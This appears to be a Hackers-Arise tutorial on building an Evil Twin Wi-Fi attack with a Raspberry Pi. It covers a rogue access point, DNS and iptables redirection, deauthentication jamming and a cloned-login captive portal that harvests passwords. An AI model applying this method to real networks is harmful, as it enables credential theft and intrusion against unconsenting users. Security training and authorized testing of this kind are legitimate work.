Welcome back, aspiring cyberwarriors!
In this second part of the Pineapple Attacks series, we move beyond purely technical weaknesses in wireless protocols and focus on the human behind the device. Today we will explore the Evil Twin attack as implemented on a custom-built Raspberry Pi-based Pineapple, showing you how wireless impersonation and social engineering can be combined into an effective attack chain. Rather than relying on cracking encryption or exploiting client-side vulnerabilities, the Evil Twin approach abuses user trust, captive portal mechanics, and normal operating system behavior to extract credentials in clear text.
As always, these techniques are intended for authorized use only.
Evil Twin
The “Evil Twin” attack is an imitation of a wireless network that users already trust. In this case, the trust belongs to the users themselves. Like phishing, it’s aimed specifically at people rather than client devices.
Since not all Wi-Fi networks are vulnerable to the attacks described earlier, and an attacker is far from always able to recover a password, another option is to simply ask the users for it. Users often turn out to be the weakest link in the perimeter. In this scenario, the Pineapple device can operate as a Wi-Fi access point with the same network name as the target. The only difference is that the network is open. It is assumed that the user will deliberately connect to what appears to be a legitimate wireless network and enter the password, which is then sent to the attacker in clear text.
To increase the likelihood that users connect to the rogue network, the Pineapple can, just as in the previous attacks, send deauthentication packets, disconnecting all clients from the legitimate wireless network. For an Evil Twin attack to succeed, the attacker must correctly launch a wireless network with a name that will reliably attract users’ attention, and build a convincing captive portal with proper pretexting. The components that form this attack are defined in the startup.sh script. The first component is the access point itself. The script used to launch the access point looks as follows.
It’s called hostapd.sh and should be placed in /home/pi/eviltwin/. You can find it here.
As soon as a client connects to the Pineapple, the green LED lights up. A configuration file template for an open wireless network looks like this:
The second component is the script that launches the DHCP server.
You can find the script here.
The yellow LED indicates that the client has received an IP address and has begun using the wireless network. The configuration of the offered network is as follows.
It is worth noting that the popular dnsmasq program is not only a DHCP server but also a DNS server and it operates in a very “hacker-style” way. In the last line of its configuration, it is instructed to resolve any DNS request from the victim to the IP address of the Pineapple. As a result, absolutely all requests are redirected to the attacking device.
To ensure that no HTTP request bypasses the device, all web traffic from clients is redirected to the Pineapple at the network level using iptables:
Pi > iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-ports 80
Now it is time for the third and most important component of the attack. It’s a small captive portal implemented using the PHP interpreter’s built-in web server.
Find it here.
It would be hard to implement a web server any more simply than this. If the user enters a password, the Pineapple signals this with a red LED. All requests are handled by the captive.php script.
Proper implementation of a captive portal is a very important and delicate point. As a rule, modern browsers send almost nothing over plain HTTP, and in many browsers support for this protocol is disabled entirely. However, captive portals are a widely accepted mechanism for restricting internet access on open wireless networks. Therefore, all modern operating systems check for the presence of a captive portal immediately after connecting by sending a special HTTP request. If the target system is not made aware that a captive portal exists at this moment, the attack will fail. To prevent this, the server must return an HTTP 200 response with non-empty content, even if the request is made to a non-existent resource. If successful, the operating system automatically displays the phishing page to the user, prompting them to enter certain data.
captive.php is merely a small wrapper between requests from victim clients and the web pages they see. Modern web pages are fairly complex, and building them from scratch is not the smartest approach. Instead, any authentication web page can be saved using a browser, and all files can be copied into /home/pi/eviltwin/www/. This makes it possible to handle all HTTP requests with a single PHP script and remain abstracted from coding during the attack.
Since data from web forms is almost always sent using the HTTP POST method, all such requests will be saved. If any of these requests contain the password parameter, the captive.sh script will react by lighting up the red LED.
User-entered data is highlighted in red in the terminal so that the attack status can be monitored even during a remote 4G connection. All output from all scripts is also saved to the Pineapple’s memory card.
Because the Evil Twin attack is social in nature, each specific situation may require its own captive portal design. The attacker does not necessarily have to request the password for a specific access point. Victims may be presented with any web form from social networks to any other website. The key is to convince the user to enter the data the attacker is interested in obtaining. It is not even necessary to imitate a legitimate network, what matters is attracting the user’s interest. The network could be called something as simple as “Free Wi-Fi.”
The final, optional touch is disconnecting clients from the legitimate network (logical signal jamming) using the deauthentication script.
When performing an Evil Twin attack with signal jamming, it is important not to “shoot yourself in the foot” and to exclude the phishing wireless network itself from the target list.
There are two things to keep in mind. First, the user must manually select the rogue network to connect to, since a client device will not automatically switch from a secured network to an open one, even if the rogue network’s name exactly matches the legitimate one. Only older operating systems and legacy devices exhibited such indiscriminate behavior, where a network could automatically downgrade from WPA to open if the SSID was the same. Second, no one will enter credentials on behalf of the user. Once such a user is found, opening any web page will persistently prompt them to enter a password, which is accepted in clear text and stored on the Pineapple.
The Evil Twin attack can be particularly effective in restricted or high-security environments with strict rules, where employees “starved for internet access” may be willing to do almost anything, including entering arbitrary data just to get online. In such environments, an attacker exploiting human weaknesses can realistically obtain domain credentials and much more, later using them to access someone’s email or connect via VPN to an internal network.
Summary
You saw the practical implementation of an Evil Twin attack using a Raspberry Pi-based Pineapple, showing how social engineering can be used to capture credentials over wireless networks. It covered the setup of a rogue access point, DHCP and DNS manipulation, traffic redirection, and a lightweight captive portal that exploits standard operating system behavior to prompt users for credentials.
For the attack to function correctly, all scripts, configuration files, and web assets referenced in the article must be placed in the /home/pi/eviltwin directory, as the startup and control scripts assume this exact file structure.
If you like the work we’re doing here and want to take your skills even further, we also offer a full SDR for Hackers Career Path. It’s a structured training program designed to guide you from the fundamentals of Software-Defined Radio all the way to advanced, real-world applications in cybersecurity and signals intelligence.
Source: HackersArise
Source Link: https://hackers-arise.com/pineapple-attacks-building-your-own-pineapple-part-2/